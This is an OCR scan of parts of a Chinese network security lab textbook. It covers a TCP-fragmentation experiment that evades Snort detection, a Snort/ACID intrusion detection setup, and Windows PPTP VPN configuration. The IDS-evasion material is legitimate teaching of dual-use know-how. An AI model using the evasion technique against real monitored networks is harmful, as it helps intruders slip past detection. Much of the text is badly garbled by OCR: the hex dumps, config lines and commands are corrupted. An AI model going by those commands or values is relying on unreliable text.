Pape en 48.604284 [+] [1:815:2] WEB-CGI websendmail access [++] [Clessification: Attempted Information Leak] [Priority: 2] {TCP} x.x.x.x:1216 -> 
WB 48.504204 [H+] [1:1163:2] WEB-MISC webdist. cei access [+*+] [Classification: Attempted Information Leak] [Priority: 2] {TCP} x.x.x.x:121T 
werd da 614284 [++] [1:857:2] WEB-CGI faxsurvey access [+*+] [Classification: Attempted Information Leak] [Priority: 2] {TCP} x, x.x.x:1218 -> 
Y y. y: 


04/23-21:22:48.624204 [ee] [1 2] WEB-CGI htmlscript access [++] [Classification: Attempted Information Leak] [Priority: 2] {TCP} x.x.x.x:1219 -> 


y.y.y. y:80 
04/23-21:22:48.624204 [++] [1:832:1] WEB-CGI perl. exe access [1+] [Classification: Attempted Information Leak] (Priority: 2] {TCP} x.x.x.x:1221 -> 
y.y.y. y:80 

04/23-21:22:48.624204 [+] [1:1175:3] WEB-WISC wreboard pl access [ty] [Classification: Attempted Information Leak] [Priority: 2] {TCP} x.x.x.x:1222 
> yyy y:80 


图 9-21 TCP 碎片 攻击 后 的 攻击 记录 
查看 攻击 过 程 中 交换 的 数据 包 ， 如 图 9-22 所 示 。 


04/23-21 :29:44. 464284 x.x.x.x:1224 -> y. y. y. y:80 
TCP TIL:64 TOS:0x0 ID:33212 IpLen:20 DenLen:60 DF 
###Sk Seq: OxBFSE312C Ack: Ox0 Win: Oxl6DO TepLen: 40 
TCP Options (5) => MSS: 1460 SeckOK TS: 4239504 0 NOP WS: 0 


stotetetetetetstetststetetststststetetst: 


04/23-21:29:44. 484284 y. y. y. y:80 -> x. x. x. x:1224 

TCP TTL:64 TOS:OxO ID:O IpLen:20 DemLen:60 DF 

XX*A**S* Seq: Ox712B69A4 Ack: Ox6F8E312D Win: Ox16A0 TepLen: 40 
TCP Options (5) => MSS: 1460 SeckOK TS: 4010144 4239504 NOP WS: 0 


stotstotstotetstotstotstotstotstststetst: 


=+=+=4=: 


04/23-21:29:44. 484284 x. x. x. x:1224 -> y. y. y. y:80 

TCP TTL:64 T0S:0x0 ID:33213 IpLen:20 DenLen:52 DF 

peewee Seq: OxBFSE312D Ack: 0x712B89A5 Win: OxIBDO TepLen: 32 
TCP Options (3) => NOP NOP TS: 4239504 4010144 


stotstetetstetstotststatototstststststot: 


04/23-21:29:44. 464284 x. x. x.x: 1224 -> y. y. y. y:80 

TCP TTL:64 TOS:0x0 ID:19801 IpLen:20 DenLen:53 DF 

XXXAPkk Seq: OxBFSE313C Ack: OxTIZBEGAS Win: Ox16D0 TepLen: 32 
TCP Options (3) => NOP NOP TS: 4239504 4010144 

86 f 


stotetotetotetstotstotstotetototstetstst: 


stotststotsts: 


04/23-21:29:44. 464284 x. x. x.x: 1224 -> y. y. y. y:80 

TCP TTL:64 TOS:0x0 ID:21838 IpLen:20 DenLen:53 DF 

x*APe Seq: Ox6F8E3144 Ack: Ox712BB9A5 Win: Ox16D0 TepLen: 32 
TCP Options (3) => NOP NOP TS: 4239504 4010144 

2E 


EE EE EE 


图 9-22 TCP 碎片 后 的 攻击 数据 包 


从 图 9-22 中 可 以 看 出 : 攻击 数据 包 都 是 只 含 一 个 字 节 数据 的 报 文 ， 而 且 发 送 的 次 序 
已 经 乱 得 不 可 辨别 ， 但 对 服务 器 TCP/IP 堆栈 来 说 ， 它 还 是 能 够 正确 重组 的 。 

服务 器 重组 的 数据 包 如 图 9-23 所 示 。 经 过 与 图 9-19 相 比 较 可 知 ， 返 回 的 数据 完全 
相同 。 可 见 Apache 处 理 后 返回 的 结果 相同 。 这 表明 TCP 碎片 攻击 成 功 ， 已 经 完全 绕 过 
了 Snort 检测 ， 直 接 传 到 了 服务 器 上 。 


=+=+=+=4=; 
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04/23-21:29:44. 474284 y. y. y. y:80 -> x.x.x.x:1224 

TCP TTL:64 T0S:0x0 ID:22843 IpLen:20 DenLen:S22 DF 

khAP4# Seq: ÜxTI2B69AS Ack: OxBFBE3148 Win: Oxl6A0 TepLen: 32 
TCP Options (3) => NOP NOP TS: 4010145 4239504 

48 54 54 50 2F 31 2E 31 20 34 30 34 20 4E GF 74 HITP/1.1 404 Not 


20 46 BF 75 BE 64 OD OA 44 61 T4 65 3A 20 54 T5 了 ound .Date: Tu 
65 2C 20 32 33 20 41 TO T2 20 32 30 30 32 20 31 e, 23 Apr 2002 1 
33 3A 32 39 3A 34 34 20 47 4D 54 OD OA 53 65 72 3:29:44 GMT..Ser 
76 65 T2 3A 20 41 70 61 63 68 65 2F 31 2E 33 2E ver: Apeche/1.3. 
32 32 20 28 55 BE 69 T8 29 20 50 48 50 2F 34 2E 22 (Unix) PHP/4. 
31 2E 32 20 6D 6F 64 SF 73 73 6C 2F 32 2E 38 2E 1.2 mod ss1/2.8. 
35 20 4F 70 65 BE 53 53 4C 2F 30 2E 39 2E 36 82 5 ÜpenSSL/0.9.6b 
OD OA 43 BF BE 8E 65 63 74 69 BF 6E 3A 20 63 6C ..Connection: cl 
BF 73 65 OD OA 43 BF 6E 74 65 BE T4 2D 54 T9 TO ose..Content-Typ 
65 3A 20 T4 65 78 74 2F 68 T4 6D 6C 3B 20 63 68 e: text/html; ch 
61 72 T3 65 T4 3D 69 73 6F 2D 38 38 35 39 2D 31 erset=iso-8859-1 
OD OA OD OA 3C 21 44 4F 43 54 58 50 45 20 48 54 .... <!DOCTYPE HT 
4D 4C 20 50 55 42 4C 49 43 20 22 2D 2F 2F 49 45 ML PUBLIC "-//IE 
54 46 2F 2F 44 54 44 20 48 54 4D 4C 20 32 2E 30 TF//DTD HTML 2.0 
2F 2F 45 4E 22 3E OA 3C 48 54 4D 4C 3E 3C 48 45 //EN">. <HTML><HE 
41 44 3E OA 3C 54 49 54 4C 45 3E 34 30 34 20 4E AD^. <TITLEMO4 N 
BF T4 20 46 GF 75 BE 64 3C 2F 54 49 54 4C 45 3E ot Found</TITLE> 
OA 3C 2F 48 45 41 44 3E 3C 42 4F 44 59 3E OA 3C . </HEAD><BODY>. < 
48 31 3E 4E GF 74 20 46 GF T5 6E 64 3C 2F 48 31 Hl2Not Found4/Hl 
3E OA 54 68 B5 20 T2 65 T1 T5 65 73 T4 65 64 20 >. The requested 
55 52 4C 20 2F 63 67 69 2D 62 69 6E 2F TO 68 66 URL /cei-bin/phf 
20 TT 61 T3 20 BE BF 74 20 66 BF T5 BE 64 20 BF wes not found o 
BE 20 74 68 69 73 20 73 65 72 T6 65 T2 2E 3C 50 n this server. P 
3E OA 3C 48 52 3E OA 3C 41 44 44 52 45 53 53 3E >. <HR>. <ADDRESS> 
41 70 61 63 68 65 2F 31 2E 33 2E 32 32 20 53 65 Apeche/1.3.22 Se 


stotetstotototetetstetatatatatetetstetst: 4=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 


图 9-23 ”服务 器 程序 重组 数据 包 


【实验 报告 】 

(1) 在 测试 报告 中 记录 下 由 Fragroute 发 出 的 数据 包 ， 没 有 经 过 碎片 攻击 时 服务 器 接收 
到 的 数据 包 ， 经 过 碎片 攻击 后 发 出 的 数据 包 及 此 时 服务 器 收 到 的 数据 包 。 比 较 其 中 的 不 同 。 

(2) 在 碎片 攻击 前 后 比较 Snort 的 报警 信息 ， 查 看 是 否 已 经 成 功 欺 骗 了 Snort. 


【思考 题 】 


CD 阐述 TCP 碎片 攻击 的 原理 。 
(2) 简 述 如 何 使 用 Avalanche 测试 入 侵 检测 系统 处 理 IP 碎片 的 能 


94 构造 Linux 下 的 入 侵 检 测 系统 


【实验 目的 】 
熟悉 Linux 系统 下 的 入 侵 检 测 系 统 的 搭建 方法 ， 掌 握 ACID 界面 的 使 用 和 操作 。 


【原理 简介 】 

Snort 是 一 个 源 代码 开放 的 、 能 够 运行 于 多 种 操作 系统 环境 下 的 入 侵 检 测 系统 , 它 可 
以 与 多 种 功能 软件 相 搭 配 完成 小 网 络 的 入 侵 检测 工作 。 

本 实验 描述 的 NIDS 采用 三 层 分 布 式 体系 结构 ， 它 包括 网 络 入 侵 探测 器 、 入 侵 事 件 
数据 库 和 基于 Web 的 分 析 控 制 台 。 为 了 避免 不 必要 的 网 络 流量 ， 本 实验 将 网 络 入 侵 探 测 
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器 和 入 侵 事 件数 据 库 整 合 在 一 全 


器 ， 并 把 它 作 为 分 析 控 制 台 


【实验 环境 】 
1. 硬件 环境 


主机 中 ,利用 标准 浏览 器 ,异地 访问 主机 上 的 Web 服务 


， 两 者 之 间 的 通信 采用 HTTPS 安全 加 密 协 议 传输 。 


(1) 4847 Windows XP 和 Red Hat Linux 9 双 系 统 的 PC 若干 台 ， 其 中 一 台 PC 上 装 有 


Snort. 


(2) 网 络 中 包含 16 A Hub 一 个 。 


(3) 装 有 Windows 2000 Server 的 PC 一 台 ， 作 为 网 络 服务 器 。 


(4) RJ-45 网 线 若 干 。 
2. 软件 环境 


本 系统 用 到 的 软件 与 9.3 节 实 验 所 用 到 的 软件 相 类 似 ， 如 表 9-2 所 示 。 表 中 的 软件 
都 是 开放 软件 ， 用 户 可 以 直接 登录 相应 软件 的 正式 网 站 下 载 源 代码 。 


软件 名 称 Xj fé füj x 
Snort 网 络 入 侵 探 测 器 

Libpcap Snort 所 依赖 的 网 络 抓 包 库 

MySQL 入 侵 事 件数 据 库 
Apache Web 服务 器 
Mod ssl 为 Apache 提供 SSL 加 密 功 能 的 模块 
OpenSSL 开放 源 代码 的 SSL 加 密 库 ， 为 mod ssl 所 依赖 
MM 为 Apache 的 模块 提供 共享 内 存 服务 
ACID 基于 Web 的 入 侵 事 件数 据 库 分 析 控 制 台 
PHP ACID 的 实现 语言 
GD 被 PHP 用 来 即时 生成 PNG 和 JPG. 图 像 的 库 
ADODB 为 ACID 提供 便捷 的 数据 库 接口 

PHPlot ACID 所 依赖 的 制图 库 

【实验 步骤 】 


表 9-2 ”本 实验 所 需 软件 


正式 网 址 
www.snort.org/ 
www.tcpdump.org/ 
www.inysql.org/ 
www.apache.org/ 
www.modssl.org/ 
www.openssl.org/ 
www.engelschall.com 
www.cert.org/kb// 
www.php.net/ 
www.boutell.com/gd 
php.weblogs.com/ 
www.phplot.com/ 


本 系统 被 用 来 监控 来 自 因特网 和 内 部 网 的 网 络 流量 。 负 责 监控 的 网 络 探测 器 Snort 使 


安装 配置 ACID 的 步骤 如 下 。 


FASE IP 地 址 的 网 卡 进行 监听 ， 以 保证 NIDS 自身 的 安全 ; 通过 另 一 块 网 卡 接 入 内 部 网 ， 并 
为 其 分 配 内 部 网 所 使 用 的 私有 1IP 地 址 ， 以 便 从 内 部 网 访问 分 析 控 
用 Apache 服务 器 的 用 户 身份 验证 和 访问 控制 机 制 ， 并 结合 SSL， 保 证 系统 的 访问 安全 。 


sitll @ Rely ACID。 通 过 启 


(1) 首先 把 acid-0.9.6b23.tar.gz 放 到 网 页 根 目录 ， 然 后 执行 如 下 命令 。 


tar zxvf acid-0.9.6b23.tar.gz 


cd acid 
vi acid conf.php 
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(2) 4) *SDBlib path-"";" “AK *SDBlib path-"/usr/local/apache/htdocs/ adodb" ". 


$alert dbname-"snort log";//P Jk snort 

$alert host-"localhost"; 

$alert port-""; 

$alert user-"root"; 

$alert password-"mypassword"; // 改 成 你 的 数据 库 密码 
/*Archive DB connection parameters*/ 

$archive dbname-"snort archive"; // 改 成 snort 
$archive host-"localhost"; 

$archive port-""; 

$archive user-"root"; 


$archive password-"mypassword;" // 改 成 你 的 数据 库 密码 

(3) JE *SChartLib path-"";" HUR “$ChartLib_path="/usr/local/apache/htdocs /jpgraph/ 
sre". 

(4) 修改 完毕 后 ， 如 图 9-24 所 示 ， 并 保存 退出 。 


TENTTTTTTTTTTTTTTTTTTTTTTTTTTTTTETTTTTTTZTTTTTTTTTTTTT 


<?php$ 

$ 

$ACID_VERSION_=_"0.9.6b23"; $ 
$ 

/* Path to the DB abstraction library $ 

_*_ (Note: DO NOT include a trailing backslash after the directory)$ 


^ e.g. $foo = "/tmp" [OK] $ 
$foo = "/tmp/" [OK] $ 
$foo = "c:Ytmp" — [OK]$ 


$foo = "c:ltmp [WRONG] $ 


tS 
$DBlib path = "/usr/local/apsche/htdocs/adodb"$ 
$ 
/* The type of underlying alert database$ 

4 
L* MySQL 
.*. PostgresSQL 
L* NS SOL Server : "mssql"$ 
737§ 

$DBtype = "mysql";$ 
$ I 
/* Alert DB connection parameters$ 
$alert dbname  : MySQL database name of Snort alert DB$ 
Salert host host on which the DB is stored$ 
$alert port port on which to access the DB$ 
.Salert user login to the database vith this user$ 
$alert password : password of the DB user$ 


: Umysql"$ 


.* This information can be gleaned from the Snort database$ 
.*. output plugin configuration.$ 

T3738 

$alert dbname — - 
$alert host 
$alert port 
$alert user 


"snort log";$ 
"localhost";$ 
"i$ 


"root";$ 
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(5) 为 了 运行 该 系统 ， 以 超级 用 户 身份 执行 下 列 命令 


/etc/init.d/mysql.server start 
/usr/local/bin/snort-c /etc/snort.conf-1 /var/log/snort-I elx0-D 
#/usr/local/bin/apachectl sslstart 


(6) BEA Web 界面 : http://yourhost/acid/acid_main.php. 
第 一 次 打开 acid_main.php 网 页 时 ， 如 果 需 要 对 数据 库 进 行 更 改 时 ， 需 要 重新 创建 若 
F ACID 的 特有 表格 。 第 一 次 运行 ACID 时 ， 将 会 出 现 如 图 9-25 所 示 的 错误 消息 。 

EJ netscape: Analysis Console for Intrusion Databases (ACID) 
File Edit View Go Communicator Help 
[| su Bookmarks Æ Location: [http: //ee1: 80/acid-session/acid_nain. php EP" what's Related 

Back Forward Reload Home Search Netscape Print — Security Shop 


Bnalusis Console for Intrusion Databases 


The underlying database snort_dbv103_test2@localhost appears to be inconplete/invalid, 


The database version is valid, but the ACID DB structure (table: acid ag) is not present, 
Use the Setup page to configure and optimize the DB. 


图 9-25 错误 消息 


(7) 单 击 Setup page 链接 进入 DB 配置 页 面 acid_db_setup.php。 在 新 的 页 面 中 可 以 
创建 必需 的 表格 。 单 击 Create ACID AG 按钮 将 会 看 到 如 图 9-26 所 示 的 界面 。 


File Edit View Go Communicator Help. 
| Sue” Bookmarks Æ Location: [http : //ee1-80/acid-session/acid db setup.php 


E Back Forward Reload Home Search Netscape Print Security Shop stop 
pe 
SOUS Hone 
ACID DB Setup Search AG Naintenance 
Status] 
ACID tables 
Adds tables to extend the Snort DB to support the ACID 
Functionality Create ACID AG 
Search Indexes (Optional) Adds indexes to the Snort DB to optimize the DONE 
speed of the queries 
[Loaded in 0 seconds] 
Ronan Danyliv RirCERT 


r ww 7 


图 9-26 更 改 acid_db_setup.php 文件 


(8) 在 创建 了 所 有 需要 的 表格 之 后 ，ACID 将 会 回 到 正确 的 界面 ， 如 图 9-27 所 示 。 

(9) 在 NIDS 已 开始 运行 后 ， 在 内 网 的 管理 PC 上 启动 浏览 器 ， 在 地 址 栏 中 输入 
“https:/192.168.1.8/acid-0.9.6b21/”， 其 中 192.168.1.8 是 为 该 NIDS 内 部 网 网 卡 分 配 的 IP 
地 址 。 首 次 运行 时 ， 控 制 台 会 提示 用 户 对 入 侵 事 件数 据 库 进行 扩展 ， 按 照 提 示 扩 展 完 毕 
后 ， 控 制 台 主 界面 出 现 ， 如 图 9-28 所 示 。 
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Netscape: ACID: DB Setup 
File Edit View Go Communicator 
‘eG Bookmarks Æ Location: http: //ee1:80/acid-session/acid db setup.php 


Back Fonyard Reload Home Search Netscape Print Security Shop 


ACID DB Setup 


Search AG Haintenance 


Successfully cre acid_ag' 


'acid ag alert' 


ACID tables Adds tables to extend the Snort DB to support the ACID functionality DONE 


Search Indexes (Optional) Adds indexes to the Snort DB to optimize the speed of the DONE 
queries 


The underlying Alert DB is configured for usage with ACID. 

Additional DB pernissions 

In order to support Alert purging (the selective ability to permanently delete alerts from 
the database) and DNS/whois lookup caching, the DB user "root" must have the DELETE and 
UPDATE privilege on the database “snort_dbv103_test2@localhost" 

Goto the Nain page to use the application, 


[Loaded in 0 seconds] 


7 
ft o due X» 的 wv] 


图 9-27 正确 启动 ACID 界面 


Added 7 alet(s) to the Alert cache 


Queried on : Sun May 01, 2005 18:25 06 
Database: snor@localhost (schema version: 105) 
Time window: (2005-05-01 18:13:27] - [2005-05-01 18:24:53) 


(Sensors: 1 
Unique Alerts: 7 ( 1 categories 


) 
[Total Number of Alerts: 14 


* Source IP addresses: 1 
* Dest. IP addresses: 1 
* Unique IP links 2 


* Source Ports: 2 

o TCP (2) UDP (0) 
* Dest. Ports: 6 
o TCP (6) UDP (0) 


图 9-28 一 天 内 的 报警 频率 


主 界面 里 显示 的 信息 包括 触发 安全 规则 的 网 络 流量 中 各 种 协议 所 占 的 比例 、 警 报 的 
数量 、 入 侵 主机 和 目标 主机 的 IP 地 址 及 端口 号 等 。ACID 控制 台 还 提供 强大 的 搜索 功能 ， 
日 户 可 根据 时 间 、 卫 地 址 、 端 口号 、 协 议 类 型 以 及 数据 净 荷 (payload). 等 多 种 条 件 的 灵 
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活 组 合 ， 在 入 侵 事件 数据 库 中 进行 查询 ， 以 帮助 网 管 人 员 进 行 分 析 。 

入 侵 特 征 库 是 否 丰富 对 一 个 NIDS 非常 重要 ， 本 系统 同时 支持 多 种 有 影响 的 入 侵 特 
征 库 ， 包 括 CERT/CC. arachNIDS 和 CVE 等 。 在 警报 中 除了 列 出 入 侵 事件 的 命名 外 ， 
还 有 到 相应 入 侵 特征 库 的 Web 链接 ， 如 果 某 个 警报 存在 多 个 命名 ， 则 同时 予以 列 出 ， 以 
便 参 考 。 网 络 管理 人 员 可 通过 这 些 链接 去 查找 在 线 入 侵 特 征 库 ， 以 便 获得 关于 特定 入 侵 
事件 更 加 详细 的 信息 和 相应 的 解决 办 法 。 

应 用 ACID 提供 的 制图 功能 可 以 直观 地 对 网 络 入 侵 事 件 进行 分 析 ， 而 生成 的 图 表 又 
可 进一步 丰富 网 管 人 员 编 制 的 报告 。 例 如 ACID 分 析 控 制 台 可 以 按 用 户 指定 的 时 间 段 生 
成 入 侵 事 件 的 频率 图 ， 如 图 9-29 所 示 。 


ACID Chart 
Time vs. Number of Alerts 


Alert Occurrences 


Time 


图 9-29 ”一周 内 的 报警 频率 


【实验 报告 】 

(1) 在 测试 报告 中 记录 下 由 ACID 绘制 出 的 10min 内 的 报警 频率 ， 以 及 20min 内 的 
报警 频率 。 

(2) 尝试 描述 出 在 由 Fragroute 发 出 的 未 分 片 的 TCP 数据 包 和 分 片 TCP 数据 包 时 
ACID 的 报警 情况 。 

【思考 题 】 

思考 ACID 与 Snort 之 间 的 通信 机 制 。 
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404 VPN 原理 简介 


所 谓 虚 拟 专 用 网 络 (Virtual Private Network，VPN)， 是 指 将 物理 上 分 布 在 不 同 地 点 
的 网 络 通过 公用 网 络 连 接 形成 的 逻辑 上 的 虚拟 子 网 ， 并 采用 认证 、 访 问 控制 、 机 密 性 、 
数据 完整 性 等 在 公众 网 络 上 构建 专用 网 络 的 技术 ， 使 得 数据 通过 安全 的 “加 密 隧 道 ”在 
公众 网 络 中 传播 。 这 里 的 公用 网 通常 指 因特网 。 

根据 VPN 的 组 网 方式 、 连 接 方式 、 访 问 方式 、 隧 道 协议 、 工 作 的 层次 COS 模型 或 
TCP/IP 模型 ) 等 的 不 同 , 可 以 有 多 种 分 类 方式 。 从 当前 应 用 来 看 ,VPN 主要 有 两 种 类 型 : 
远程 访问 /移动 用 户 VPN 连接 和 网 关 -网 关 VPN 连接 ， 下 面 将 做 简单 介绍 。 

1. 远程 访问 /移动 用 户 VPN 连接 

远程 访问 VPN 连接 由 远程 访问 客户 机 提出 连接 请 求 ，VPN 服务 器 提供 对 VPN 服务 
器 或 整个 网 络 资源 的 访问 服务 。 在 此 连接 中 ， 链 路 上 第 一 个 数据 包 总 是 由 进行 远程 访问 
的 客户 机 发 出 的 。 远 程 访 问 客户 机 先 对 服务 器 提供 自己 的 身份 认证 ， 之 后 作为 双向 认证 
的 第 二 步 ， 服 务 器 也 对 客户 机 证 明 自 己 的 身份 。 

2. 网 关 -网 关 VPN 连接 

网 关 - 网 关 VPN 连接 由 呼叫 网 关 提出 连接 请 求 ， 另 一 端 VPN 网 关 做 出 响应 。 在 这 种 
方式 中 ， 链 路 的 两 端 各 自 是 专用 网 络 的 两 个 不 同 部 分 ， 通 常 来 自 呼叫 网 关 的 数据 包 并 非 
源 自 该 网 关 本 身 ， 一 般 来 自 其 内 网 的 子 网 主机 。 呼 叫 网 关 首先 对 应 答 网 关 提 供 自己 的 身 
份 认 证 ， 作 为 双向 认证 的 第 二 步 ， 应 答 网 关 也 应 对 呼叫 网 关 证 明 自 己 的 身份 。 

一 个 典型 VPN 的 组 成 部 分 如 图 10-1 所 示 。 

VPN 隧 道 VPN 连 接 
| 公共 网 络 


phet 


VPN 服 务 器 VPN Psi 


图 10-1. 典型 VPN 组 成 


VPN 服务 器 : 接受 来 自 VPN 客户 机 的 连接 请 求 。 
VPN 客户 机 : 可 以 是 终端 计算 机 也 可 以 是 路 由 器 。 
隧道 : 数据 传输 通道 ， 在 其 中 传输 的 数据 必须 经 过 封装 。 
VPN 连接 : 在 VPN 连接 中 ， 数 据 必须 经 过 加 密 。 
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e 隧道 协议 : 封装 数据 、 管 理 隧 道 的 通信 标准 。 
e 传输 数据 : 经 过 封装 、 加 密 后 在 隧道 上 传输 的 数据 。 
e 公共 网 络 : 如 Intermnet， 也 可 以 是 其 他 共享 型 网 络 。 
从 隧道 协议 及 工作 层次 对 VPN 分 类 ， 又 可 以 将 其 分 为 PPTP VPN、L2F VPN, L2TP 
VPN. MPLS VPN, IPSec VPN、SSL VPN、SOCKS VPN. 
有 关 VPN 的 详细 讨论 ， 请 参考 《网 络 安全 一 一 技术 与 实践 》( 刘 建 伟 、 王 育 民 编 车 ， 
清华 大 学 出 版 社 出 版 ) 一 书 。 
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【实验 目的 】 
(1) 通过 实验 掌握 虚拟 专用 网 的 实现 原理 和 基本 结构 。 
(2) 熟悉 在 Windows 中 的 基于 PPTP VPN 的 配置 。 


【原理 简介 】 

隧道 技术 的 核心 是 隧道 协议 。 由 3Com 和 Microsoft 等 开发 的 点 对 点 隧道 协议 (Point 
to Point Tunneling Protocol, PPTP) 是 第 一 个 广泛 使 用 建立 的 VPN 隧道 协议 。PPTP 是 点 
对 点 协议 CPPP) 的 扩展 ， 主 要 在 认证 、 压 缩 和 加 密 功 能 上 做 了 相当 的 扩展 。PPTP 在 一 
个 已 存在 的 IP 连接 上 封装 PPP 会 话 ， 只 要 网 络 层 是 连通 的 ， 就 可 以 运行 PPTP. PPTP 
将 控制 包 和 数据 包 分 开 ， 控制 包 采 用 TCP 控制 ， 用 于 严格 的 状态 查询 以 及 信 令 信息 ; 数 
据 包 部 分 先 封 装 在 PPP 中 ， 然 后 封装 到 GRE 协议 〈 通 用 路 由 封装 协议 ) 中 ， 用 于 标准 
IP 包 中 封装 任何 形式 的 数据 包 。 

【实验 环境 】 

本 实验 中 ， 需 要 以 下 设备 和 软件 。 

(1) 一 台 Windows 2003 Server 的 服务 器 。 

(2) 两 台 Windows XP Professional, Windows 2000 Professional 或 Windows 7 Ultimate, 
其 中 一 台 作 为 嗅 探 (Sniffer) 主机 ， 另 一 台 作 为 客户 端 。 

(3) 三 台 机 器 使 用 Hub 连接 ， 以 便于 嗅 探 。 

具体 连接 如 图 10-2 所 示 。 

【实验 步骤 】 

(1) 首先 配置 VPN 服务 器 ， 在 Windows 2003 Server 中 打开 控制 面板 中 的 【管理 工 
RL 双击 【路 由 和 远程 访问 】 进 入 配置 界面 ， 如 图 10-3 所 示 。 

(2) 右 击 已 存在 的 本 地 服务 器 名 称 〈 如 图 10-3 所 示 )， 选 择 【 配 置 并 启用 路 由 和 远 
程 访问 】 菜 单 ， 将 会 弹出 【路 由 和 远程 访问 服务 器 安装 向 导 】 对 话 框 (如 图 10-4 所 示 )， 
单 击 【 下 一 步 】 按 钮 。 
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Hub 


客户 端 服务 器 
Windows XP Professional Windows Server 2003 
IP 192.168.2.18 IP 192.168.2.254 


图 10-2 实验 环境 


SEW hw 


办 路 由 和 远程 访问 BUAA-EE-USER1 (本 地 ) 


t9 


所 有 任务 QD Er 
E] * 


[n 
刷新 中 d 

I)e 
REW 


EHW 
要 添加 一 个 路 由 和 远程 访问 服务 器 ， 在 “操作 ”菜单 ， 单 击 “ 添 
加 服务 器 ”。 


有 关 安 装 路 由 和 远程 访问 ， 部 署 方案 ， 以 及 疑难 解答 的 更 多 信 —— 
息 ， 请 参阅 帮助 。 


PERDRA NCR cI MIA 
图 10-3 【路 由 和 远程 访问 】 配 置 界 面 


Ss MRE A SS 
欢迎 使 用 路 由 和 远程 访问 服务 器 安装 向 导 


pd  eomVisRsDERA 
HFR BER EP RNE s 


要 继续 ， 请 单 击 “ 下 一 步 ” 


a mm 
图 10-4 【路 由 和 远程 访问 服务 器 安装 向 导 】 对 话 框 


109 


mmm 网 络 安全 实验 教程 (第 2 版 ) ES 


(3) 在 【配置 】 界 面 中 ， 在 Windows Server 2003 系统 下 用 双 网 卡 建立 VPN 服务 器 
更 容易 实现 ， 但 需要 在 一 台 服 务 器 上 配置 两 块 网 卡 。 本 实验 介绍 使 用 单 网 卡 实现 建立 
VPN 服务 器 的 方法 。 选 择 【 自 定义 配置 】 并 单 击 【下 一 步 】 按 钮 《如 图 10-5 所 示 )。 


RE = 
您 可 以 启用 下 列 服务 的 任意 组 全 » RACAL SEUSS. ge 


C 远程 访问 GSR VPN) QD 
PPT paa eetehi Ate) Internet 连接 来 连接 到 


C 网 络 地 址 转换 QUT) Œ) 
区 许 内 部 客 尸 请 使 用 一 个 公共 IP 地 址 连接 到 Internet. 
C 虚拟 专用 网 络 WP 了 访问 和 NAT QD 
许 远程 客户 ; Internet 连接 到 此 服务 器 ， 本 地 客户 端 使 用 一 个 单一 的 
公共 IP Internet, 
C 两 个 专用 网 络 之 间 的 安全 连接 GO 
将 此 网 络 连 接 到 一 个 远程 网 络 ， 例 如 一 个 分 支 办 公 室 。 
c BEZEECO 
选择 在 路 由 和 运程 访问 中 的 任何 可 用 功能 的 组 合 。 
有 关 这 些 选项 的 更 多 信息 ， 请 参阅 路 由 和 远程 访问 帮助 


Lm | 

图 10-5 选择 【 自 定义 配置 】 
(4) 在 【 自 定义 配置 】 中 ,选择 【VPN 访问 】 选 项 ， 单 击 【下 一 步 】 按 钮 (如 图 10-6 
所 示 )， 然 后 在 下 一 个 界面 中 单 击 【 完 成 】 按 钮 ， 完 成 安装 向 导 配 置 。 系 统 会 弹出 对 话 框 
询问 是 否 开 始 路 由 和 远程 访问 服务 ， 单 击 【 是 】 按 钮 开始 服务 。 


自 定义 配置 
关闭 此 向 导 后 SOR PRISES HE M E PRS. ge 
选择 您 起 在 此 服务 器 上 局 用 的 服务 
Fe Vei BO) 
r asaw 


厂 请 求 拨号 连接 (由 分 支 办 公 室 路 由 使 用 ) © 
NAT 和 基本 防火 墙 避 ) 
厂 LA Bee) 


x | 
图 10-6 选择 【VPN 访问 】 


(5) 接 下 来 是 开放 用 户 的 拨 入 权限 ， 同 样 在 【管理 工具 】 中 选择 【计算 机 管理 】 在 
【计算 机 管理 】 界面 的 控制 台 左 边 双击 【本 地 用 户 和 组 )， 展 开 后 选择 【用 户 】( 如 图 10-7 
所 示 )。 
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EE 
加 文件 四 ”操作 各 SEV BOW 帮助 o | 248124] 
€ » mAB i 
S 计算 机 管理 CERDO 
Sh 系统 工具 E isis 管理 计算 机 SOAP 
mp 事件 查看 器 ASP.NET 计算 机 账户 用 于 运行 ASP_ WET 辅助 进程 (as 
S) HEXER 供 来 宾 访 问 计算 机 或 访问 域 的 内 
日 区 本 地 用 户 和 组 IUSR BUAA... Internet 来 宾 账户 匿名 访问 Internet 信息 服务 的 
EI TEM BUMA.. 启动 IIS 进程 账户 用 于 启动 进程 外 应 用 程序 的 Int 
由 pM Bisvrroir s. CHWicrosoft Corpora... 这 是 一 个 帮助 和 支持 服务 的 提供 
2) 设备 管理 器 
=) Gy Fie 
m 存储 
MERKES 
HREL 
D 服务 和 应 用 程序 
E 
I 


图 10-7 


【计算 机 管理 】 界 面 


(6) 直接 对 右边 的 Administrator 进行 权限 开放 : 右 击 Administrator， 选 择 【 属性】， 


弹出 【Administrator 属性 】 对 话 框 后 ， 选 择 
【 拨 入 】 选 项 卡 ， 如 图 10-8 所 示 。 在 【远程 
访问 权限 〈 拨 入 或 VPN)】 一 栏 中 选中 【人 允 
许 访问 】 然后 单 击 【 确 定 】 按 钮 退出 。 到 此 
为 止 ， 服 务 器 的 配置 已 经 全 部 完成 ， 接 下 来 
是 客户 端的 配置 。 

CD. 从 这 一 步 开 始 配置 客户 端 ， 打 开 控 
制 面板 中 的 【网 络 连接 】， 窗口 弹出 后 ， 选 择 
菜单 【文件 】 中 的 【新 建 连接 】， 此 时 将 弹出 
【新 建 连接 向 导 】， 单 击 【 下 一 步 】 按 钮 。 

(8) 在 【网 络 连接 类 型 】 中 选择 【连接 
到 我 的 工作 场所 的 网 络 ]， 并 单 击 【 下 一 步 】 
按钮 。 

(9) 在 【网 络 连接 】 中 ， 选 择 【 虚 拟 专 
用 网 络 连接 】 


常规 | 隶属 于 | 配置 文件 | 环境 | 会 话 
远程 控制 | 终端 服务 配置 文件 BA 

「 远 程 访问 权限 GAR ven 
6 RD) 
C 拒绝 访问 四 ) 
C 通过 远程 访问 策略 控制 访问 © 
T- WENS DW: 
回执 选项 
C FARO 

C BORO ARE (REE MEETS) ©) 
C 总 是 回 所 到 QD); 

T aed ip 地 址 O 
T 应 用 静态 路 由 QD 

为 此 氢 入 连接 定义 要 启用 的 路 由 。 


m 


[————À 
PEREU, 


axi 


取消 ER D 
图 10-8 Administrator 用 户 属性 设置 


(10) 下 一 步 是 公司 名 称 的 填写 ， 可 以 直接 单 击 【 下 一 步 】 按 钮 跳 过 。 
